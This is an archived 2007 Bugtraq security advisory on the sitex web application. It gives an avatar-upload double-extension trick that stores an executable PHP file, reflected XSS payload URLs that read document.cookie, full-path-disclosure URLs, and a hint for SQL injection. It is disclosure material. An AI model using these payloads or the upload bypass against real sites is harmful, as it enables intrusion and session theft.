[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070223194905.14470.qmail@securityfocus.com>
Date: 23 Feb 2007 19:49:05 -0000
From: none@...e.com
To: bugtraq@...urityfocus.com
Subject: sitex multiple vulnerabilities
global risk:critical
upload vulnerability:
in user profile upload an avatar with a double extension like :
file.php.jpg
once it's done,you gone get an error like:Fatal error: Call to undefined function imagedestroy() in /.
but the last extension (jpg) will be removed by the script, and stored in :
/content/avatars
has ramdom_numberfile.php
xss get :
/sitex/calendar.php?sxMonth=1&sxYear='"><script>alert(document.cookie)</script>
/sitex/search.php?search=<script>alert(document.cookie)</script>
xss via mysql error:
/sitex/redirect.php?linkid='</textarea>'"><script>alert(document.cookie)</script>
/calendar_events.php?page='"><script>alert(document.cookie)</script>
full path disclosure:
/sitex/calendar.php?sxMonth[]=1
/sitex/calendar.php?sxMonth=1&sxYear[]=2007
/calendar_events.php?page[]=1
multiples errors sql :
just add a ' on any var ..
or on any fields ( like in forum,search,...etc )
regards laurent gaffié
Powered by blists - more mailing lists